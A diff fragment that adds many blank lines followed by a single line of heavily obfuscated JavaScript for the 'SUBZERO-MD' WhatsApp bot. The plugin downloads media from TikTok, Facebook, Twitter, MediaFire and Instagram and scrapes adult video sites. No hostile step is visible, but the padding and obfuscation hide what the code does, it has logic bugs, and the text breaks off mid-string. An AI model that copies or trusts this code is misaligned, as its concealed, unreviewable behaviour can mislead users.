+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
|
222 |
+
const _0x59c8a1=_0x3cc3;(function(_0x522a97,_0x924d45){const _0x5e3251=_0x3cc3,_0x4dd1ed=_0x522a97();while(!![]){try{const _0xd50ebe=parseInt(_0x5e3251(0x1bc))/0x1+-parseInt(_0x5e3251(0x104))/0x2+parseInt(_0x5e3251(0x1a0))/0x3*(parseInt(_0x5e3251(0x1cc))/0x4)+parseInt(_0x5e3251(0x15e))/0x5+-parseInt(_0x5e3251(0x178))/0x6*(-parseInt(_0x5e3251(0x16c))/0x7)+-parseInt(_0x5e3251(0x112))/0x8+-parseInt(_0x5e3251(0x119))/0x9*(parseInt(_0x5e3251(0x1d3))/0xa);if(_0xd50ebe===_0x924d45)break;else _0x4dd1ed['push'](_0x4dd1ed['shift']());}catch(_0x2ef58e){_0x4dd1ed['push'](_0x4dd1ed['shift']());}}}(_0x573c,0x30f2c));function hi(){const _0x913382=_0x3cc3;console[_0x913382(0x115)](_0x913382(0x182));}hi();const {fetchJson}=require('../lib/functions'),{downloadTiktok}=require(_0x59c8a1(0x13a)),{facebook}=require('@mrnima/facebook-downloader'),cheerio=require(_0x59c8a1(0x12a)),{igdl}=require(_0x59c8a1(0x15b)),axios=require(_0x59c8a1(0x17a)),{cmd,commands}=require(_0x59c8a1(0x16f));cmd({'pattern':_0x59c8a1(0x189),'alias':['tt'],'react':'🎥','desc':'download\x20tt\x20videos','category':_0x59c8a1(0x12b),'filename':__filename},async(_0x5ae9c0,_0x3c333b,_0x2b4570,{from:_0x9844ab,quoted:_0x7df7b4,body:_0xc7bd11,isCmd:_0x40282a,command:_0x3a1509,args:_0x225720,q:_0x41b239,isGroup:_0x5e07ff,sender:_0x4841c7,senderNumber:_0x91626b,botNumber2:_0xaaa8f4,botNumber:_0x5df9a4,pushname:_0x1f910c,isMe:_0x2861a7,isOwner:_0x5caa8a,groupMetadata:_0x191640,groupName:_0x20a3a6,participants:_0x55627d,groupAdmins:_0x634660,isBotAdmins:_0x253299,isAdmins:_0x17e8fe,reply:_0xd1d81c})=>{const _0x4058ae=_0x59c8a1;try{if(!_0x41b239&&!_0x41b239[_0x4058ae(0x162)]('https://'))return _0xd1d81c(_0x4058ae(0x113));_0x2b4570[_0x4058ae(0x1c7)]('⬇️');let _0x1a86fa=await downloadTiktok(_0x41b239),_0x2608b1='╭━━━〔\x20*SUBZERO-MD*\x20〕━━━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*TIKTOK\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━━━❐━⪼\x0a┇๏\x20*Title*\x20-\x20'+_0x1a86fa[_0x4058ae(0x141)][_0x4058ae(0x106)]+_0x4058ae(0x142);const _0x13dcc5=await _0x5ae9c0['sendMessage'](_0x9844ab,{'image':{'url':_0x1a86fa[_0x4058ae(0x141)][_0x4058ae(0x19b)]},'caption':_0x2608b1}),_0x474438=_0x13dcc5[_0x4058ae(0x195)]['id'];_0x5ae9c0['ev']['on'](_0x4058ae(0x125),async _0x2ef136=>{const _0x31bb7d=_0x4058ae,_0x5df53b=_0x2ef136[_0x31bb7d(0x1c1)][0x0];if(!_0x5df53b[_0x31bb7d(0x1c3)])return;const _0x3c75c2=_0x5df53b['message'][_0x31bb7d(0x1b5)]||_0x5df53b['message']['extendedTextMessage']?.['text'],_0x2e299b=_0x5df53b['key']['remoteJid'],_0x28cf6b=_0x5df53b[_0x31bb7d(0x1c3)][_0x31bb7d(0x1ce)]&&_0x5df53b[_0x31bb7d(0x1c3)][_0x31bb7d(0x1ce)][_0x31bb7d(0x11e)]['stanzaId']===_0x474438;if(_0x28cf6b){await _0x5ae9c0['sendMessage'](_0x2e299b,{'react':{'text':'⬇️','key':_0x5df53b[_0x31bb7d(0x195)]}});let _0x4b65bf=_0x1a86fa[_0x31bb7d(0x141)];await _0x5ae9c0[_0x31bb7d(0x13e)](_0x2e299b,{'react':{'text':'⬆️','key':_0x5df53b['key']}});if(_0x3c75c2==='1')await _0x5ae9c0[_0x31bb7d(0x13e)](_0x2e299b,{'video':{'url':_0x4b65bf['dl_link'][_0x31bb7d(0x193)]},'caption':_0x31bb7d(0x1d5)},{'quoted':_0x5df53b});else{if(_0x3c75c2==='2')await _0x5ae9c0['sendMessage'](_0x2e299b,{'video':{'url':_0x4b65bf[_0x31bb7d(0x163)][_0x31bb7d(0x153)]},'caption':_0x31bb7d(0x1d5)},{'quoted':_0x5df53b});else _0x3c75c2==='3'&&await _0x5ae9c0[_0x31bb7d(0x13e)](_0x2e299b,{'audio':{'url':_0x4b65bf[_0x31bb7d(0x163)][_0x31bb7d(0x1a6)]},'mimetype':_0x31bb7d(0x11c)},{'quoted':_0x5df53b});}}});}catch(_0x52452c){console[_0x4058ae(0x115)](_0x52452c),_0xd1d81c(''+_0x52452c);}}),cmd({'pattern':'fb','alias':['facebook'],'desc':_0x59c8a1(0x1a3),'category':_0x59c8a1(0x12b),'filename':__filename},async(_0x54cfdd,_0x409152,_0x34d193,{from:_0x4bb953,quoted:_0x10d7b1,body:_0x42454e,isCmd:_0x3bb54b,command:_0x1df1f5,args:_0x4490ee,q:_0x35674b,isGroup:_0x48e836,sender:_0x3b7a73,senderNumber:_0xb6cf8b,botNumber2:_0x4e0368,botNumber:_0x34d40b,pushname:_0xd9e744,isMe:_0x5ea741,isOwner:_0x238375,groupMetadata:_0x4d4573,groupName:_0x306c5d,participants:_0x4ffb79,groupAdmins:_0x57c1f2,isBotAdmins:_0x472bc9,isAdmins:_0x541c31,reply:_0x1c785f})=>{const _0x517e06=_0x59c8a1;try{if(!_0x35674b||!_0x35674b[_0x517e06(0x162)](_0x517e06(0x197)))return _0x54cfdd[_0x517e06(0x13e)](_0x4bb953,{'text':_0x517e06(0x14a)},{'quoted':_0x409152});await _0x54cfdd['sendMessage'](_0x4bb953,{'react':{'text':'⏳','key':_0x409152['key']}});const _0x1bf030=await facebook(_0x35674b),_0x199e5e='╭━━━〔\x20*SUBZERO-MD*\x20〕━━━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*FB\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━━━❐━⪼\x0a┇๏\x20*Duration*\x20-\x20'+_0x1bf030['result'][_0x517e06(0x139)]+_0x517e06(0x157),_0x570d56=await _0x54cfdd[_0x517e06(0x13e)](_0x4bb953,{'image':{'url':_0x1bf030[_0x517e06(0x141)][_0x517e06(0x10e)]},'caption':_0x199e5e},{'quoted':_0x409152}),_0x35d60e=_0x570d56[_0x517e06(0x195)]['id'];_0x54cfdd['ev']['on'](_0x517e06(0x125),async _0x12577b=>{const _0xe8adc9=_0x517e06,_0x1faf9f=_0x12577b['messages'][0x0];if(!_0x1faf9f[_0xe8adc9(0x1c3)])return;const _0x42416c=_0x1faf9f[_0xe8adc9(0x1c3)][_0xe8adc9(0x1b5)]||_0x1faf9f['message'][_0xe8adc9(0x1ce)]?.[_0xe8adc9(0x1d0)],_0x2007e6=_0x1faf9f[_0xe8adc9(0x195)][_0xe8adc9(0x1bf)],_0x3d220b=_0x1faf9f[_0xe8adc9(0x1c3)][_0xe8adc9(0x1ce)]&&_0x1faf9f[_0xe8adc9(0x1c3)]['extendedTextMessage']['contextInfo'][_0xe8adc9(0x13b)]===_0x35d60e;if(_0x3d220b){await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'react':{'text':'⬇️','key':_0x1faf9f[_0xe8adc9(0x195)]}});let _0x3f6883=_0x1bf030['result'];await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'react':{'text':'⬆️','key':_0x1faf9f[_0xe8adc9(0x195)]}});if(_0x42416c===_0xe8adc9(0x121))await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'video':{'url':_0x3f6883[_0xe8adc9(0x16e)]['SD']},'caption':'*©\x20Powered\x20Bʏ\x20SᴜʙZᴇʀᴏ*'},{'quoted':_0x1faf9f});else{if(_0x42416c===_0xe8adc9(0x17c))await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'video':{'url':_0x3f6883[_0xe8adc9(0x16e)]['HD']},'caption':'*©\x20Powered\x20Bʏ\x20SᴜʙZᴇʀᴏ*'},{'quoted':_0x1faf9f});else{if(_0x42416c===_0xe8adc9(0x114))await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'audio':{'url':_0x3f6883[_0xe8adc9(0x16e)]['SD']},'mimetype':_0xe8adc9(0x11c)},{'quoted':_0x1faf9f});else{if(_0x42416c===_0xe8adc9(0x155))await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'document':{'url':_0x3f6883['links']['SD']},'mimetype':'audio/mpeg','fileName':_0xe8adc9(0x1dd),'caption':_0xe8adc9(0x102)},{'quoted':_0x1faf9f});else _0x42416c==='2.3'&&await _0x54cfdd[_0xe8adc9(0x13e)](_0x2007e6,{'audio':{'url':_0x3f6883['links']['SD']},'mimetype':_0xe8adc9(0x110),'ptt':!![]},{'quoted':_0x1faf9f});}}}}});}catch(_0x5d3f3d){console['log'](_0x5d3f3d),_0x1c785f(''+_0x5d3f3d);}}),cmd({'pattern':_0x59c8a1(0x1b0),'alias':['tweet',_0x59c8a1(0x151)],'desc':_0x59c8a1(0x149),'category':'download','filename':__filename},async(_0x400977,_0x50436f,_0x1f878d,{from:_0x4d4663,quoted:_0x1c31de,body:_0x277ab1,isCmd:_0xcb2860,command:_0x4b9da5,args:_0x2a07dc,q:_0x206333,isGroup:_0x59f93b,sender:_0x48c787,senderNumber:_0x52adec,botNumber2:_0x3bd644,botNumber:_0xc9a982,pushname:_0x1cfb08,isMe:_0x351ba6,isOwner:_0x2dffe9,groupMetadata:_0x365ad0,groupName:_0x25e258,participants:_0x23abe8,groupAdmins:_0x3797c4,isBotAdmins:_0x274c42,isAdmins:_0x51965b,reply:_0x31021d})=>{const _0x4e51bb=_0x59c8a1;try{if(!_0x206333||!_0x206333['startsWith'](_0x4e51bb(0x197)))return _0x400977['sendMessage'](_0x4d4663,{'text':_0x4e51bb(0x181)},{'quoted':_0x50436f});await _0x400977['sendMessage'](_0x4d4663,{'react':{'text':'⏳','key':_0x50436f[_0x4e51bb(0x195)]}});const _0x2cbeef=await axios[_0x4e51bb(0x1c8)](_0x4e51bb(0x1a7)+_0x206333),_0x2d5547=_0x2cbeef['data'];if(!_0x2d5547||!_0x2d5547[_0x4e51bb(0x183)]||!_0x2d5547[_0x4e51bb(0x141)])return _0x1f878d['reply'](_0x4e51bb(0x118));const {desc:_0x574846,thumb:_0x42fc8a,video_sd:_0x50729,video_hd:_0x3deca6}=_0x2d5547['result'],_0x4df14e=await _0x400977[_0x4e51bb(0x13e)](_0x4d4663,{'image':{'url':_0x42fc8a},'caption':_0x4e51bb(0x108)},{'quoted':_0x50436f}),_0x5cc4cf=_0x4df14e[_0x4e51bb(0x195)]['id'];_0x400977['ev']['on']('messages.upsert',async _0x1390e0=>{const _0x5aba55=_0x4e51bb,_0x47e1b4=_0x1390e0[_0x5aba55(0x1c1)][0x0];if(!_0x47e1b4['message'])return;const _0x493423=_0x47e1b4[_0x5aba55(0x1c3)][_0x5aba55(0x1b5)]||_0x47e1b4[_0x5aba55(0x1c3)][_0x5aba55(0x1ce)]?.[_0x5aba55(0x1d0)],_0x1aa453=_0x47e1b4[_0x5aba55(0x195)]['remoteJid'],_0x57f985=_0x47e1b4[_0x5aba55(0x1c3)][_0x5aba55(0x1ce)]&&_0x47e1b4[_0x5aba55(0x1c3)][_0x5aba55(0x1ce)][_0x5aba55(0x11e)]['stanzaId']===_0x5cc4cf;if(_0x57f985){await _0x400977['sendMessage'](_0x1aa453,{'react':{'text':'⬇️','key':_0x47e1b4['key']}});if(_0x493423===_0x5aba55(0x121))await _0x400977[_0x5aba55(0x13e)](_0x1aa453,{'video':{'url':_0x50729},'caption':_0x5aba55(0x102)},{'quoted':_0x47e1b4});else{if(_0x493423===_0x5aba55(0x17c))await _0x400977[_0x5aba55(0x13e)](_0x1aa453,{'video':{'url':_0x3deca6},'caption':_0x5aba55(0x102)},{'quoted':_0x47e1b4});else{if(_0x493423==='2.1')await _0x400977[_0x5aba55(0x13e)](_0x1aa453,{'audio':{'url':_0x50729},'mimetype':_0x5aba55(0x11c)},{'quoted':_0x47e1b4});else{if(_0x493423===_0x5aba55(0x155))await _0x400977[_0x5aba55(0x13e)](_0x1aa453,{'document':{'url':_0x50729},'mimetype':_0x5aba55(0x11c),'fileName':_0x5aba55(0x136),'caption':_0x5aba55(0x102)},{'quoted':_0x47e1b4});else _0x493423===_0x5aba55(0x186)&&await _0x400977[_0x5aba55(0x13e)](_0x1aa453,{'audio':{'url':_0x50729},'mimetype':_0x5aba55(0x110),'ptt':!![]},{'quoted':_0x47e1b4});}}}}});}catch(_0x5cdcc3){console[_0x4e51bb(0x115)](_0x5cdcc3),_0x31021d(_0x4e51bb(0x1aa)+_0x5cdcc3);}}),cmd({'pattern':_0x59c8a1(0x167),'alias':[_0x59c8a1(0x128)],'desc':'To\x20download\x20MediaFire\x20files.','react':'🎥','category':_0x59c8a1(0x12b),'filename':__filename},async(_0x43359b,_0x37fd12,_0x22fdaa,{from:_0x5e4e1b,quoted:_0x4945cd,body:_0x3ff829,isCmd:_0x47c498,command:_0x294e44,args:_0xfde5a4,q:_0x481ac5,isGroup:_0x471195,sender:_0x703b2d,senderNumber:_0xaabab6,botNumber2:_0x2f85a5,botNumber:_0x8d3ff8,pushname:_0x202559,isMe:_0x5bb81c,isOwner:_0x5ed012,groupMetadata:_0x8d0f6e,groupName:_0x33a222,participants:_0xe6c465,groupAdmins:_0x570c39,isBotAdmins:_0xe9aa47,isAdmins:_0x2908ad,reply:_0x29c9aa})=>{const _0x329506=_0x59c8a1;try{if(!_0x481ac5)return _0x22fdaa[_0x329506(0x1a5)](_0x329506(0x129));_0x22fdaa['react']('⬇️');const _0x1a6778=await axios[_0x329506(0x1c8)](_0x329506(0x123)+_0x481ac5),_0x2b2be7=_0x1a6778[_0x329506(0x1b9)];if(!_0x2b2be7||!_0x2b2be7[_0x329506(0x183)]||!_0x2b2be7[_0x329506(0x141)]||!_0x2b2be7[_0x329506(0x141)][_0x329506(0x163)])return _0x22fdaa['reply'](_0x329506(0x17b));const _0x1aacc6=_0x2b2be7[_0x329506(0x141)][_0x329506(0x163)],_0x5cfade=_0x2b2be7[_0x329506(0x141)]['fileName']||_0x329506(0x165),_0x58eb24=_0x2b2be7['result'][_0x329506(0x1cf)]||_0x329506(0x184);_0x22fdaa['react']('⬆️');let _0x43057f='╭━━━〔\x20*SUBZERO-MD*\x20〕━━━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*MFIRE\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━━━❐━⪼\x0a┇๏\x20*File\x20Name*\x20-\x20'+_0x5cfade+_0x329506(0x116)+_0x58eb24+_0x329506(0x171);await _0x43359b['sendMessage'](_0x5e4e1b,{'document':{'url':_0x1aacc6},'mimetype':_0x58eb24,'fileName':_0x5cfade,'caption':_0x43057f},{'quoted':_0x37fd12});}catch(_0x3852d9){console[_0x329506(0x192)](_0x3852d9),_0x29c9aa('An\x20error\x20occurred:\x20'+_0x3852d9[_0x329506(0x1c3)]);}}),cmd({'pattern':'ig','alias':['insta',_0x59c8a1(0x1d6)],'desc':_0x59c8a1(0x1d4),'react':'🎥','category':_0x59c8a1(0x12b),'filename':__filename},async(_0x1f1cd2,_0x32e92e,_0x9dcf1a,{from:_0x45c7da,quoted:_0x36d19b,body:_0x3801bf,isCmd:_0x3e59f2,command:_0x18c45d,args:_0x589738,q:_0x26bbee,isGroup:_0x32fd23,sender:_0x31517e,senderNumber:_0x3a401c,botNumber2:_0x1d0315,botNumber:_0x5485e6,pushname:_0x161ba9,isMe:_0x428f45,isOwner:_0x998bd3,groupMetadata:_0x1e0423,groupName:_0xfd2117,participants:_0x5ca132,groupAdmins:_0x34a1eb,isBotAdmins:_0x4520dc,isAdmins:_0x3edbbf,reply:_0x597309})=>{const _0x5db726=_0x59c8a1;try{if(!_0x26bbee)return _0x9dcf1a[_0x5db726(0x1a5)](_0x5db726(0x1d1));_0x9dcf1a['react']('⬇️');let _0x5e1325=await igdl(_0x26bbee),_0x15bec5=await _0x5e1325[_0x5db726(0x1b9)];for(let _0x33bd45=0x0;_0x33bd45<0x14;_0x33bd45++){let _0x28d450=_0x15bec5[_0x33bd45],_0x3c8ae4=_0x28d450[_0x5db726(0x187)];_0x9dcf1a['react']('⬆️'),await _0x1f1cd2[_0x5db726(0x13e)](_0x45c7da,{'video':{'url':_0x3c8ae4},'mimetype':_0x5db726(0xf8),'caption':_0x5db726(0x18b)},{'quoted':_0x32e92e}),_0x9dcf1a['react']('✅');}}catch(_0x3ab295){console[_0x5db726(0x115)](_0x3ab295);}});async function xdl(_0x871c2b){return new Promise((_0x2e53ee,_0x20023b)=>{const _0x8aeac0=_0x3cc3;fetch(''+_0x871c2b,{'method':_0x8aeac0(0x1c8)})[_0x8aeac0(0x1b3)](_0x1a834f=>_0x1a834f[_0x8aeac0(0x1d0)]())[_0x8aeac0(0x1b3)](_0x1a9bbb=>{const _0x47a508=_0x8aeac0,_0x1b7eab=cheerio['load'](_0x1a9bbb,{'xmlMode':![]}),_0x3fea69=_0x1b7eab(_0x47a508(0x109))['attr'](_0x47a508(0x18e)),_0x3369f1=_0x1b7eab(_0x47a508(0x164))[_0x47a508(0x1cb)](_0x47a508(0x18e)),_0x4ae4e6=_0x1b7eab(_0x47a508(0x145))[_0x47a508(0x1cb)](_0x47a508(0x18e)),_0x2adcaa=_0x1b7eab(_0x47a508(0x161))[_0x47a508(0x1cb)](_0x47a508(0x18e)),_0x57a2b3=_0x1b7eab(_0x47a508(0x16d))[_0x47a508(0x1cb)](_0x47a508(0x18e)),_0x2bded2=_0x1b7eab(_0x47a508(0x131))[_0x47a508(0x1cb)](_0x47a508(0x18e)),_0x42a42a=_0x1b7eab(_0x47a508(0x1b7))[_0x47a508(0x1d0)](),_0x17c607=_0x1b7eab(_0x47a508(0x170))[_0x47a508(0x16b)](),_0x2796b6={'low':(_0x17c607['match']('html5player.setVideoUrlLow\x5c(\x27(.*?)\x27\x5c);')||[])[0x1],'high':_0x17c607[_0x47a508(0x117)]('html5player.setVideoUrlHigh\x5c(\x27(.*?)\x27\x5c);'||[])[0x1],'HLS':_0x17c607['match'](_0x47a508(0x1a8)||[])[0x1],'thumb':_0x17c607[_0x47a508(0x117)](_0x47a508(0x1b4)||[])[0x1],'thumb69':_0x17c607[_0x47a508(0x117)](_0x47a508(0x126)||[])[0x1],'thumbSlide':_0x17c607[_0x47a508(0x117)]('html5player.setThumbSlide\x5c(\x27(.*?)\x27\x5c);'||[])[0x1],'thumbSlideBig':_0x17c607[_0x47a508(0x117)](_0x47a508(0x196)||[])[0x1]};_0x2e53ee({'status':!![],'result':{'title':_0x3fea69,'URL':_0x871c2b,'duration':_0x3369f1,'image':_0x4ae4e6,'videoType':_0x2adcaa,'videoWidth':_0x57a2b3,'videoHeight':_0x2bded2,'info':_0x42a42a,'files':_0x2796b6}});})[_0x8aeac0(0x13d)](_0x356be5=>_0x20023b({'status':![],'result':_0x356be5}));});}cmd({'pattern':_0x59c8a1(0x19d),'alias':[_0x59c8a1(0x12e),_0x59c8a1(0x152)],'react':'🫣','desc':'Download\x20xnxx\x20videos','category':_0x59c8a1(0x11a),'use':_0x59c8a1(0x198),'filename':__filename},async(_0x435b41,_0x4d5638,_0x77d4de,{from:_0x46ff07,l:_0x520351,quoted:_0x5eb447,body:_0x3029ae,isCmd:_0x1d9dbb,command:_0x4d1e6b,args:_0x4edd10,q:_0x2aab8b,isGroup:_0x8f1df9,sender:_0x2655cb,senderNumber:_0x504deb,botNumber2:_0x5c1827,botNumber:_0x4c6515,pushname:_0x43ba73,isMe:_0x204bbd,isOwner:_0x3e076a,groupMetadata:_0x3b31ce,groupName:_0x570c51,participants:_0x2145f8,groupAdmins:_0x3de22c,isBotAdmins:_0x89bd77,isAdmins:_0x4b986e,reply:_0x301fd4})=>{const _0x109f2a=_0x59c8a1;try{if(!_0x2aab8b)return _0x301fd4(_0x109f2a(0x150));let _0x330ccf=await xdl(_0x2aab8b),_0x2534b7=_0x330ccf[_0x109f2a(0x141)]['title'];await _0x435b41[_0x109f2a(0x13e)](_0x46ff07,{'video':{'url':_0x330ccf[_0x109f2a(0x141)][_0x109f2a(0x111)][_0x109f2a(0x1ad)]},'caption':_0x2534b7},{'quoted':_0x4d5638});}catch(_0x309a73){_0x301fd4('*Error\x20!!*'),console[_0x109f2a(0x115)](_0x309a73);}}),cmd({'pattern':'xvdown','alias':[_0x59c8a1(0x10a),_0x59c8a1(0x127)],'react':'🫣','desc':'Download\x20xvideos\x20videos','category':'nsfw','use':_0x59c8a1(0x146),'filename':__filename},async(_0x2ae57e,_0x30fbe9,_0x1312ab,{from:_0x28e19a,l:_0x51bc3d,quoted:_0x2b72df,body:_0x91316,isCmd:_0x503ab1,command:_0x4cef13,args:_0x5eee26,q:_0x5705d7,isGroup:_0x4acbbd,sender:_0x3d4b5b,senderNumber:_0x400647,botNumber2:_0x7537c3,botNumber:_0x280913,pushname:_0x5449dc,isMe:_0x404a43,isOwner:_0x11bf39,groupMetadata:_0xe27fb7,groupName:_0x591067,participants:_0x3b528b,groupAdmins:_0x54387d,isBotAdmins:_0x1bef42,isAdmins:_0x14f7d7,reply:_0x3bc6af})=>{const _0x47b92c=_0x59c8a1;try{if(!_0x5705d7)return _0x3bc6af('*Please\x20give\x20me\x20url\x20!!*');let _0x558196=await fetchJson(_0x47b92c(0x14f)+_0x5705d7);const _0x952046=_0x47b92c(0x18d)+_0x558196[_0x47b92c(0x141)][_0x47b92c(0x106)]+_0x47b92c(0x1d2)+_0x558196[_0x47b92c(0x141)][_0x47b92c(0x1da)]+_0x47b92c(0x130)+_0x558196[_0x47b92c(0x141)][_0x47b92c(0x10d)]+_0x47b92c(0x156)+_0x558196['result']['deslike']+_0x47b92c(0xfd)+_0x558196['result'][_0x47b92c(0x143)];await _0x2ae57e['sendMessage'](_0x28e19a,{'video':{'url':_0x558196['result'][_0x47b92c(0x163)]},'caption':_0x952046},{'quoted':_0x30fbe9});}catch(_0x218082){_0x3bc6af('*Error\x20!!*'),console['log'](_0x218082);}});function _0x573c(){const _0x490f4a=['twdl','xnxxdl','download_mp4_2','quality','2.2','\x0a\x0a•\x20*Deslike*\x20-\x20','\x20\x0a╰━━━❐━⪼\x0a╭━❮\x20*Download\x20Video*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*1.1*\x20\x20\x20\x20\x20┃\x20\x20*SD\x20Quality*\x0a┃▸┃๏\x20*1.2*\x20\x20\x20\x20\x20┃\x20\x20*HD\x20Quality*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a╭━❮\x20*Download\x20Audio*\x20❯━┈⊷\x0a┃▸╭─────────────·๏\x0a┃▸┃๏\x20*2.1*\x20\x20\x20\x20\x20┃\x20\x20*Audio*\x0a┃▸┃๏\x20*2.2*\x20\x20\x20\x20\x20┃\x20\x20*Document*\x0a┃▸┃๏\x20*2.3*\x20\x20\x20\x20\x20┃\x20\x20*Voice*\x0a┃▸└────────────┈⊷\x0a╰━━━━━━━━━━━━━━━⪼\x0a>\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20Sᴜʙᴢᴇʀᴏ\x20♡*','\x20|\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*','*Available\x20PixelDrain\x20Download\x20Links:*\x0a','gdrive','ruhend-scraper','Error\x20fetching\x20the\x20download\x20link:','.zip','728560LRBoxg','\x0a⏳\x20*ᴅᴀᴛᴇ:-*\x20','🎬\x20*','meta[property=\x22og:video:type\x22]','startsWith','dl_link','meta[property=\x22og:duration\x22]','mediafire_download','div#player-holder\x20iframe','mediafire','No\x20downloadable\x20link\x20found\x20for\x20this\x20episode.','\x0a🔗\x20Link:\x20','*Please\x20provide\x20a\x20search\x20query!\x20(e.g.,\x20Garfield)*','html','49HpGyCH','meta[property=\x22og:video:width\x22]','links','../command','#video-player-bg\x20>\x20script:nth-child(6)','\x20\x0a╰━━━❐━⪼\x0a>\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*','movie2','Invalid\x20selection.\x20Please\x20reply\x20with\x20a\x20valid\x20number.','pop','*Error\x20occurred\x20while\x20scraping!*','downloadUrl','Failed\x20to\x20retrieve\x20the\x20download\x20link\x20for\x20this\x20episode.','232476ggKQvS','https://pixeldrain.com/api/file/','axios','Failed\x20to\x20fetch\x20MediaFire\x20download\x20link.\x20Ensure\x20the\x20link\x20is\x20valid\x20and\x20public.','1.2','🎥\x20*','*An\x20error\x20occurred\x20while\x20searching!*','*\x0a\x0a>\x20Lααɾα-ᴍᴅ\x20✻','downloaded_episode.zip','❌\x20Please\x20provide\x20a\x20valid\x20Twitter\x20URL.','Hello\x20World!','status','application/octet-stream','No\x20results\x20found\x20for:\x20','2.3','url','postedTime','tiktok','div.inner-video-thumb-wrapper\x20img','>\x20*©\x20Pᴏᴡᴇʀᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ*','http://ws75.aptoide.com/api/7/apps/search/query=','\x0a\x20\x20\x20🔞\x20*XVIDEO\x20DOWNLOADER*\x20🔞\x0a\x0a\x20\x20\x20\x20\x20\x0a•\x20*Title*\x20-\x20','content','https://www.baiscope.lk/?s=','path_alt','📺\x20Search\x20Results\x20for\x20*','error','download_mp4_1','imageUrl','key','html5player.setThumbSlideBig\x5c(\x27(.*?)\x27\x5c);','https://','.xnxx\x20<xnxx\x20link>','\x20\x0a┇๏\x20*Developer*\x20-\x20','h5.elementor-post__title\x20>\x20a','image','find','xnxxdown','*🪄\x20ɴᴀᴍᴇ:-*\x20','href','3QLKHsg','stream','updated','Download\x20Facebook\x20videos','baiscope.lk','reply','download_mp3','https://www.dark-yasiya-api.site/download/twitter?url=','html5player.setVideoHLS\x5c(\x27(.*?)\x27\x5c);','join','An\x20error\x20occurred:\x20','pipe','mrnima-moviedl','high','No\x20PixelDrain\x20links\x20found.','list','twitter','fileName','episodeLink','then','html5player.setThumbUrl\x5c(\x27(.*?)\x27\x5c);','conversation','╭━〔\x20*SUBZERO-APPSTORE*\x20〕━┈⊷\x0a┃▸╭───────────\x0a┃▸┃๏\x20*APK\x20DOWNLOADER*\x0a┃▸└───────────···๏\x0a╰────────────────┈⊷\x0a╭━━━❐━⪼\x0a┇๏\x20*Name*\x20-\x20','span.metadata','src','data','MB\x20\x0a┇๏\x20*Package*\x20-\x20','finish','159655sabgBl','Download\x20powered\x20by\x20SUBZERO-ai','*An\x20error\x20occurred\x20while\x20scraping\x20the\x20data.*','remoteJid','forEach','messages','createWriteStream','message','push','datalist','https://api.fgmods.xyz/api/downloader/gdrive?url=','react','get','\x22:\x0a\x0a','length','attr','1564324rgawDi','div.posted-time','extendedTextMessage','fileType','text','Please\x20Give\x20Me\x20a\x20vaild\x20Link...','\x0a\x0a•\x20*Views*\x20-\x20','260EMCCsY','To\x20download\x20instagram\x20videos.','*©\x20Powered\x20Bʏ\x20SᴜʙZᴇʀᴏ*','Instagram','\x0a⬇️\x20Download\x20will\x20follow.','\x20\x